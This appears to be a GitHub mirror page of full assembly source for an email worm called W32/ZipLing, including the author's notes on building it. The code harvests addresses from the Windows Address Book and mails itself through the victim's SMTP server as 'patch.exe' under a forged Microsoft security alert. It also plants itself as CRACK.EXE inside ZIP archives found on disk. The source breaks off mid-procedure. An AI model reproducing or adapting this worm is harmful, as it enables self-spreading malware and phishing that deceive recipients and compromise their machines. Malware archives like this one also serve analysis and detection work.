ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/Win32/Infector/Win32.Zipling.asm

970 lines
22 KiB
NASM
Raw Normal View History

Add files via upload
2020-10-11 03:09:34 +00:00
;
; W32/ZipLing -
;
; First of all this is the source code to an I-Worm. I do not guarantee it works, although
; I have tested it on my system and it had seemed to work. I lost interest in it after a while
; so I completely forgot about it until one day, when i decided to finish my I-Worm ;). It should
; work however, because as far as my short-term memory goes back it seemed to work OK where it
; was at a couple of weeks ago. Basically now I just added in the threads and took out the breakpoints,
; so I think it should travel nicely (if it was spreaded). Anyway, please contact me if you find
; a problem or if you'd like to comment on it. I am not responsible for what happens to you or
; other people if you use it. You've been warned =)
;
;
; This is my I-Worm. I been workin on it for about 4 weeks (i took a bit of a break for 1
; week:). It doesn't travel by MAPI but it does somewhat rely on Outlook. It needs Windows
; Address Book, but this shouldn't be a problem because most people have outlook. It uses its
; own SMTP engine. It Mime encodes the worm EXE and sends it out to all addresses in the default
; WAB file. As you can see, this can spread very well if it gets sent to the right place. This
; worm uses many anti-debug and anti-emu tricks, to make detection of it harder. It creates 2 threads:
; 1 checks 1 drive for zip files, dropping a crack.exe over all of them.
; User may think it is a bit suspicious but I'm sure he doesnt look at all of his zip files. Other thread
; finds email addresses and sends each a copy of the worm+msg from microsoft :). Worm is named patch.exe
; and claims to fix a serious bug inside windows core (kernel32) files. It doesn't though; it just gives
; a message saying corrupt CRC or something the like. The file that it drops inside zip files says same
; thing, and since they are crack.exe and patch.exe it should fit both.
;
;
; This source is does not have many comments. If you want to learn how to create a worm,
; I recommend you try the MAPI way first. There are a couple of ASM worms that are straight
; forward for you to learn on.
;
;
;
; How to build:
; (masm32)
; ml /c /coff ziplung.asm
; link /SUBSYSTEM:WINDOWS ziplung.obj
; pewrsec ziplung.exe
; ziplung.exe
; ^^^^^^^^^^^-> hehehe
;
; please pay visit to http://bluebola.8k.com !
;
; and.. Enjoy.
.486p
.model flat,stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\zipfile.inc
include \masm32\include\advapi32.inc
include \masm32\include\kernel32.inc
include \masm32\include\wsock32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\user32.lib
SearchZIP PROTO :DWORD
thread1 PROTO
thread2 PROTO
.code ; CODE SECTION of worm
start:
jmp @F
filename db 128 dup (?)
szTemp db "tmp9174.tmp",0
mem01 dd 0
hTemp dd 0
tSize dd 0
thid1 dd 0
thid2 dd 0
fr db 260 dup (?)
msg db "Could not patch due to bad CRC!",0
@@:
invoke GetModuleFileName,0,addr filename,128
invoke CopyFile,addr filename,addr szTemp,0
invoke CreateFile,addr szTemp,0c0000000h,01h,00h,03h,00h,00h
mov hTemp,eax
invoke GetFileSize,EAX,0
mov ebx,eax
invoke GlobalAlloc,0,eax
mov mem01,eax
invoke ReadFile,hTemp,mem01,ebx,addr filename,00h
invoke CloseHandle,hTemp
; MEM01 now = ptr to our EXE. We need this for MIME and ZIP appending
mov tSize,EBX
mov zpC_S1,EBX ; adjust the size of our data
mov zpC_S2,EBX
mov zpL_S1,EBX
mov zpL_S2,EBX
invoke MessageBox,0,addr msg,0,0
invoke CreateThread,0,0,addr thread1,addr fr,0,addr thid1
mov ebx,eax
invoke CreateThread,0,0,addr thread2,0,0,addr thid2
mov esi,eax
invoke WaitForSingleObject,ebx,-1
invoke WaitForSingleObject,esi,-1
jmp LeaveNow
Recipient db 256 dup (?)
sizeRecip dd $-Recipient
sendtable:
dd offset SendHelo ; HELO LocalHost
dd offset SendFrom ; MAIL FROM:
dd offset SendRcpt ; RCPT TO:
dd offset SendData1 ; send the DATA part of the message
dd offset SendData2 ; sends the actual DATA
dd offset SendQuit ; send the QUIT part
dd 00000000h ; end marka
buffer db 512 dup (?)
; Used for SELECT calls
Timeout:
dd 5
dd 0
FDSet:
dd 1
MailSocket dd 0
SendWorm: ; This little part of the worm does this here:
; Gets Default Email server
; Connects to it
; Sends the message
pushad
openkey:
xor eax,eax
call @F
phkMailKey dd 0
@@:
push KEY_ALL_ACCESS
push eax
call @F
db "Software\Microsoft\Internet Account Manager"
slashkey db 0
db "Accounts\"
lpDefaultAccount db 8 dup(0)
db 0
@@:
push HKEY_CURRENT_USER
call RegOpenKeyEx
or eax,eax
jnz LeaveNow
cmp byte ptr [slashkey],0
jnz getsmtpmail
xor eax,eax
call @F
dd 00000009h
@@:
push offset lpDefaultAccount
push eax
push eax
call @F
db "Default Mail Account",0
@@:
push dword ptr [phkMailKey]
call RegQueryValueEx
push dword ptr [phkMailKey]
call RegCloseKey
mov byte ptr [slashkey],'\'
jmp openkey
getsmtpmail:
xor eax,eax
call @F
dd 00000200h ; 512 bytes
@@:
push offset buffer
push eax
push eax
call @F
db "SMTP Server",0
@@:
push dword ptr [phkMailKey]
call RegQueryValueEx
push dword ptr [phkMailKey]
call RegCloseKey
lea edi,buffer
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
call @F
pp2 WSADATA <?>
@@:
push 0101h
call WSAStartup
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
push edi
call gethostbyname
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax] ; we got the DWORD IP
mov dword ptr [dwIPAddress],EAX
push 0
push 1
push 2
call socket
mov MailSocket,EAX
inc eax
jz LeaveNow
push 16 ; size of following structure
call @F
dw AF_INET
hPort db 0, 25
dwIPAddress dd 0
Reserved2 dd 0,0
@@:
push dword ptr [MailSocket]
call connect
inc eax
jz EndWinsock
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
cld
lea ebx,sendtable ; sendtable = table of functions that operate w/ smtp server
WaitForResponse: ; check if its ok to read
xor eax,eax
push offset Timeout
push eax
push eax
push offset FDSet
push eax
call select
dec eax
jnz EndWinsock
call @worm_recv ; receive the data into ptr supplied by ESI
or eax,eax
jz EndWinsock
lodsb
dec esi ; we dont want to modify ESI
okiebyte equ $+1 ; to change the 032h
cmp al,032h ; 032h = "2" = OK :)
jnz EndWinsock ; no no its not ok
mov byte ptr [okiebyte],032h ; fixor it when we mess it up
SendOurResponse: ; check if its okay to write
xor eax,eax
push offset Timeout
push eax
push offset FDSet
push eax
push eax
call select
dec eax
jnz EndWinsock
call dword ptr [ebx]
or eax,eax
jz EndWinsock ; zero = error
cmp dword ptr [ebx+4],0
jz EndWinsock ; end of table
add ebx,4
jmp WaitForResponse
SendHelo: ; sends a HELO command
jmp @F
pHelo db "HELO LocalHost",0Dh,0Ah
sHelo equ $-pHelo
@@:
lea esi,pHelo
mov ecx,sHelo
call @worm_send ; send the data
ret
SendQuit: ; sends a QUIT command
jmp @F
pQuit db "QUIT",0Dh,0Ah
sQuit equ $-pQuit
@@:
lea esi,pQuit
mov ecx,sQuit
call @worm_send ; send the data
ret
SendFrom:
jmp @F
pFrom db "MAIL FROM:<critical@microsoft.com>",0Dh,0Ah
sFrom equ $-pFrom
@@:
lea esi,pFrom
mov ecx,sFrom
call @worm_send
ret
SendRcpt:
jmp @F
pRcpt db "RCPT TO:<"
sRcpt equ $-pRcpt
pRcpt2 db ">",0Dh,0Ah
sRcpt2 equ $-pRcpt2
@@:
lea esi,pRcpt
mov ecx,sRcpt
call @worm_send
lea esi,Recipient ; who to email it to
mov ecx,sizeRecip ; Size of the string
call @worm_send
lea esi,pRcpt2
mov ecx,sRcpt2
call @worm_send ; send the 0A0Dh so server accepts it
ret
SendData1:
jmp @F
pData db "DATA",0Dh,0Ah
sData equ $-pData
@@:
lea esi,pData
mov ecx,sData
call @worm_send
mov byte ptr [okiebyte],033h
ret
SendData2:
jmp @F
pData2 db "From: Microsoft Critical Response Team <critical@microsoft.com>",0Dh,0Ah
db "Subject: Urgent message for all Windows users",0Dh,0Ah
db "MIME-Version: 1.0",0Dh,0Ah
db 'Content-Type: multipart/mixed; boundary="bound"',0Dh,0Ah
db 0Dh,0Ah
db '--bound',0Dh,0Ah
db 'Content-Type: text/plain; charset=ISO-8859-1',0Dh,0Ah
db 'Content-Transfer-Encoding: 7bit',0Dh,0Ah
db 0Dh,0Ah
db "Dear Windows User,",0Dh,0Ah
db 0Dh,0AH
db " The Microsoft Security Experts have discovered a bug inside the Windows'",0Dh,0Ah
db " files that poses a security threat to all versions of Windows newer than ",0Dh,0Ah
db " Windows98 (including Windows98). Virus experts have reported that few known",0Dh,0Ah
db " viruses have been identified using this exploit, but more are expected. A ",0Dh,0Ah
db " patch has been supplied with this email and will fix the security hole. ",0Dh,0Ah
db 0Dh,0Ah
db " **THIS MESSAGE WAS DELIVERED VIA MICROSOFT ALERT AUTO-MESSENGER** ",0Dh,0Ah
db '--bound',0Dh,0Ah
db 'Content-Type: application/octet-stream; name=patch.exe',0Dh,0Ah
db 'Content-Transfer-Encoding: base64',0Dh,0Ah
db 0Dh,0Ah
sData2 equ $-pData2
pDot db 0Dh,0Ah,'--bound--',0Dh,0Ah
db 0Dh,0Ah
db "."
db 0Dh,0Ah
sDot equ $-pDot
mem02 dd 0
@@:
lea esi,pData2
mov ecx,sData2
call @worm_send
; Send the actual file in mime format
invoke GlobalAlloc,0,7168*3 ; for mime encoded
mov mem02,eax
mov eax,tSize ; Data size MUST BE DIVISIBLE BY 3!
mov ecx,3
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx
mov ecx,eax
mov edx,mem02
mov eax,mem01
call encodebase64
mov esi,mem02
call @worm_send
lea esi,pDot
mov ecx,sDot
call @worm_send
invoke GlobalFree,mem02
ret
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
EndWinsock:
push dword ptr [MailSocket]
call closesocket
popad
ret
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LeaveNow:
invoke ExitProcess,0
@worm_recv:
lea esi,buffer
push 0
push 512
push esi
push dword ptr [MailSocket]
call recv
ret
@worm_send:
; ESI = ptr to what to send
; ECX = size of data to send
push 0
push ecx
push esi
push dword ptr [MailSocket]
call send
ret
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; ZIP Appending procedures (c) blueEbola 2001-2002
; Feel free to distibute this procedure or use it in your own code.
;
zipappend:
jmp @F
zpLocalFile dd 04034B50h ; PK signature
dw 0014h
dw 8000h
dw 0000h
dw 8C78h
dw 8578h
zpL_crc dd 00000000h
zpL_S1 dd sizeLoc-data_s
zpL_S2 dd sizeLoc-data_s
dw 0009h ; filename = 8 chars long
dw 0000h
db "CRACK.EXE" ; Most users run cracks hehe (we give a fake message :)
data_s:
sizeLoc equ $
fName dd 0 ; pointer to name to infect
hFile dd 0
fSize dd 0
hAlloc dd 0
dwTempRW dd 0
zpCentralDir dd 02014b50h
db 14h
db 00h
db 14h
db 00h
dw 8000h
dw 0000h
dw 8c78h
dw 8578h
zpC_crc dd 00000000h
zpC_S1 dd sizeLoc-data_s
zpC_S2 dd sizeLoc-data_s
dw 0009h
dw 0,0,0,0
dd 00000020h
rvaloc dd 00000000h
db "CRACK.EXE"
sizeCen equ $
@@:
mov fName,ESI
mov ecx,zpL_S1
mov esi,mem01
call CRC32
mov zpC_crc,EAX
mov zpL_crc,EAX
invoke CreateFile,fName,0c0000000h,01h,00h,03h,00h,00h
mov hFile,EAX
inc eax
jz errorzip
dec eax
invoke GetFileSize,hFile,0
mov fSize,EAX
invoke GlobalAlloc,0,fSize
mov hAlloc,EAX
invoke ReadFile,hFile,eax,fSize,addr dwTempRW,0
invoke CloseHandle,hFile
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Appends to data to zip files. (c) blueEbola (me'za love copyrights:)
; Most of this was taken from my zippy_ok.asm file and my article, greetz to me :)
mov edi,hAlloc
add edi,fSize
sub edi,4
LocateEndOfCentral:
cmp dword ptr [edi],06054B50h ; PK signature for endofcentral
jz FoundEndOfCentral
dec edi
jmp LocateEndOfCentral
FoundEndOfCentral:
; OK, we have to check if it is infected
jmp checkzip
Infect:
ASSUME EDI:PTR ZIPEndOfCentralDir
mov esi,[edi].ZECD_RVACentralDir
invoke CreateFile,fName,0C0000000h,01h,00h,02h,00h,00h
mov hFile,EAX
mov ebx,hAlloc
invoke WriteFile,hFile,ebx,esi,addr dwTempRW,0
add ebx,esi
invoke WriteFile,hFile,addr zpLocalFile,sizeLoc-zpLocalFile,addr dwTempRW,0
invoke WriteFile,hFile,mem01,tSize,addr dwTempRW,0
mov ecx,[edi].ZECD_SizeOfCentralDir
invoke WriteFile,hFile,ebx,ecx,addr dwTempRW,0
mov rvaloc,esi
invoke WriteFile,hFile,addr zpCentralDir,sizeCen-zpCentralDir,addr dwTempRW,0
mov ebx,rvaloc
add ebx,sizeLoc-zpLocalFile ; size of file
add ebx,zpL_S1
mov ecx,[edi].ZECD_SizeOfCentralDir
add ecx,sizeCen-zpCentralDir
mov [edi].ZECD_SizeOfCentralDir,ECX
inc [edi].ZECD_TotalNumberOfEntries
inc [edi].ZECD_NumberOfEntries
mov [edi].ZECD_RVACentralDir,EBX
mov ebx,hAlloc
add ebx,fSize
sub ebx,edi
invoke WriteFile,hFile,edi,ebx,addr dwTempRW,0
invoke CloseHandle,hFile
errorzip:
invoke GlobalFree,hAlloc ; free the mem
ret
checkzip:
pushad
search: cmp dword ptr [edi],02014B50h
jz foundlast
dec edi
jmp search
foundlast: lea edi,[edi+2Eh] ; Filename
cmp dword ptr [edi],'CARC' ; CRAC*.***
popad
jz errorzip ; abort
jmp Infect
CRC32 proc ; ecx = size string esi = string
push esi ; I found this proc inside T2000's article on encrypting ZIP files
push edx ; thanx T2000 you're a life saver (i been looking everywhere for good CRC32
; function because WinZip didn't like my old one!) :) greetz to you!
stc
sbb edx,edx
clc
cld
LoadChar:
lodsb
xor dl,al
mov al,08h ; 8 bits
BitCRC:
shr edx,1 ; get bit into carry flag
jnc NoCRC ; not set, no CRC
xor edx,0EDB88320h ; crc found
NoCRC: dec al ; next bit
jnz BitCRC
loop LoadChar
xchg edx,eax
not eax
pop edx
pop esi
ret
CRC32 endp
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; ZIP search procedure
;
; Recursive ZIP file find function
; Infects every 3rd zip file found on the system
; BTW, In MASM32 v7.0, the FindFile example was created by me :)
;
; Requirements: s_path buffer must not contain '\' at the end of it (ie. 'C:\Windows')
;
SearchZIP PROC s_path:DWORD ; ptr at s_path must be 260 bytes long (will crash otherwise!:)
LOCAL wTemp[260]:BYTE ; temporary
LOCAL wfd:WIN32_FIND_DATA
LOCAL hFind:DWORD
invoke Sleep,300d ; wait a 0.3 seconds
jmp zerodir ; zero out the string above
__ret001:
lea edi,wTemp
push edi
mov esi,s_path
mov ecx,260
rep movsb
pop edi
xor al,al
scasb
jnz $-1 ; get to the 0byte
dec edi
mov ax,'*\'
stosw
invoke FindFirstFile,addr wTemp,addr wfd
mov hFind,EAX
push eax
inc eax
jz NoFiles
pop ebx
; API's dont modify EBX- its good for handles
.while EBX > 0
lea esi,wfd.cFileName ; filename
lodsw
.if AX != 2E2Eh && AX != 002Eh ; '..' or '.'
; its not those silly directories...
sub esi,02Eh
mov eax,[esi]
.if AL & 010h ; is it a directory
; It is a directory
lea esi,wfd.cFileName
lea edi,wTemp
mov al,'*'
scasb
jnz $-1
sub edi,2
push edi
xor ecx,ecx
mov al,'\'
boohoo: stosb
lodsb
inc ecx
cmp al,00h
jnz boohoo
pop edi
pushad
invoke SearchZIP,addr wTemp
popad
mov ax,'*\'
stosw
sub ecx,2
xor al,al
rep stosb
.else
; It is a file
; Now we have to check if it is a .ZIP file
lea edi,wfd.cFileName
xor al,al
xor ecx,ecx
not ecx
repnz scasb
sub edi,5
mov eax,dword ptr [edi]
or eax,020202020h
cmp eax,'piz.' ; .zip file?
jnz __ret002
lea edi,wTemp
mov al,'*'
xor ecx,ecx
not ecx
repnz scasb
sub edi,2
xor eax,eax
stosw
invoke SetCurrentDirectory,addr wTemp
lea esi,wfd.cFileName
pushad
call zipappend
popad
lea edi,wTemp
xor al,al
xor ecx,ecx
not ecx
repnz scasb
sub edi,2
mov ax,'*\'
stosw
.endif
.endif
jmp zerowfd
__ret002:
invoke FindNextFile,hFind,addr wfd
mov ebx,eax
.endw
invoke FindClose,hFind
NoFiles:
ret
;###########################
zerodir:
xor al,al
lea edi,wTemp
mov ecx,260
rep stosb
jmp __ret001
zerowfd:
xor al,al
lea edi,wfd.cFileName
mov ecx,256
rep stosb
jmp __ret002
SearchZIP ENDP
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; EncodeBase64: Encodes data into MIME format
encodebase64: ; encodeBase64: Proper credit goez out to BumbleBee. I struggled with making
; my own MIME encoder so I ripped one.. :) Thanks alot Bumblebee!!
; input:
; EAX = Address of data to encode
; EDX = Address to put encoded data
; ECX = Size of data to encode
; output:
; ECX = size of encoded data
;
xor esi,esi
call over_enc_table
db "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
db "abcdefghijklmnopqrstuvwxyz"
db "0123456789+/"
over_enc_table:
pop edi
push ebp
xor ebp,ebp
baseLoop:
movzx ebx,byte ptr [eax]
shr bl,2
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
mov bx,word ptr [eax]
xchg bl,bh
shr bx,4
mov bh,0
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
inc eax
mov bx,word ptr [eax]
xchg bl,bh
shr bx,6
xor bh,bh
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
inc eax
xor ebx,ebx
movzx ebx,byte ptr [eax]
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
inc eax
inc ebp
cmp ebp,24
jna DontAddEndOfLine
xor ebp,ebp ; add a new line
mov word ptr [edx+esi],0A0Dh
inc esi
inc esi
test al,00h ; Optimized (overlap rlz!)
org $-1
DontAddEndOfLine:
inc ebp
sub ecx,3
or ecx,ecx
jne baseLoop
mov ecx,esi
add edx,esi
pop ebp
ret
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Locates addresses inside the default WAB file
WABFindAddies PROC
jmp @F
mappedFile dd 0
mapHandle dd 0
fileHandle dd 0
addrbuf db 256 dup (?)
@@:
xor eax,eax
call @F
phkWABKey dd 0
@@:
push KEY_ALL_ACCESS
push eax
call @F
db "Software\Microsoft\WAB\WAB4\Wab File Name",0
@@:
push HKEY_CURRENT_USER
call RegOpenKeyEx
xor eax,eax
call @F
dd 0000007Fh
@@:
push offset wabfile
push eax
push eax
push eax ; null for (default)
push dword ptr [phkWABKey]
call RegQueryValueEx
push dword ptr [phkWABKey]
call RegCloseKey
push 0
push 0
push 3
push 0
push 1
push 80000000h
call @F
wabfile db 128 dup (?)
@@:
call CreateFile
mov fileHandle,eax
xchg eax,ebx
or ebx,ebx
jz leavewab
push 0
push ebx
call GetFileSize
mov esi,eax
push 0
push esi
push 0
push PAGE_READONLY
push 0
push ebx
call CreateFileMapping
mov mapHandle,eax
xchg eax,ebx
or ebx,ebx
jz leavewab
push esi
push 0
push 0
push FILE_MAP_READ
push ebx
call MapViewOfFile
mov mappedFile,eax
xchg eax,ebx
or ebx,ebx
jz leavewab
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; Find the addresses
; EBX=Base address
mov esi,ebx
mov ecx,[esi+64h] ; number of addies
add esi,[esi+60h] ; points to first address
looperz:
push esi
lea edi,Recipient
push edi
lop:
lodsw
stosb
or al,al
jnz lop
pop ebx
sub edi,ebx
mov sizeRecip,EDI
pop esi
add esi,044h
PUSHAD
CALL SendWorm ; send the worm out!
POPAD
push ecx
lea edi,Recipient
xor al,al
mov ecx,256
rep stosb
pop ecx
dec ecx
jecxz leavewab
jmp looperz
